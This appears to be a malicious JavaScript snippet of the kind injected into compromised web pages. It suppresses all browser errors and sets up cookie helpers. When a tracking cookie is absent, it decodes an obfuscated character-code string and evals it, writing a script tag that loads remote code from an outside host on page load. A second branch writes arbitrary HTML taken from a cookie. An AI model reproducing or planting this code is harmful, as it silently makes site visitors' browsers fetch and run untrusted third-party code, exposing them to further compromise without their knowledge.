function killYouErrors() { return true; } window.onerror = killYouErrors; function GetYouCookieVal(offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function SetYouCookie(name, value) { var expdate = new Date(); var argv = SetYouCookie.arguments; var argc = SetYouCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; if(expires!=null) expdate.setTime(expdate.getTime() + ( expires * 1000 )); document.cookie = name + "=" + escape (value) +((expires == null) ? "" : ("; expires="+ expdate.toGMTString())) +((path == null) ? "" : ("; path=" + path)) +((domain == null) ? "" : ("; domain=" + domain)) +((secure == true) ? "; secure" : ""); } function DelYouCookie(name) { var exp = new Date(); exp.setTime (exp.getTime() - 1); var cval = GetYouCookie (name); document.cookie = name + "=" + cval + "; expires="+ exp.toGMTString(); } function GetYouCookie(name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i_ = 0; while (i_ < clen) { var j_ = i_ + alen; if (document.cookie.substring(i_, j_) == arg) return GetYouCookieVal (j_); i_ = document.cookie.indexOf(" ", i_) + 1; if (i_ == 0) break; } return null; } if (GetYouCookie("my_ad")==null) { var r_=/@/gi;var t_="60,@@5,99,@@4,@05,@@2,@@6,32,@@5,@@4,99,6@,@04,@@6,@@6,@@2,58,47,47,@09,@09,99,46,98,@05,98,@05,@08,48,46,99,@@0,47,97,@@5,@@2,46,@06,@@5,62,60,47,@@5,99,@@4,@05,@@2,@@6,62";t_=t_.replace(r_,"1");document.write(eval("String.fromCharCode("+t_+")")); } else if (GetYouCookie("my_ad")=="yes") { var my_ad=GetYouCookie("ad_str") if (my_ad!=null) {document.write(my_ad)} }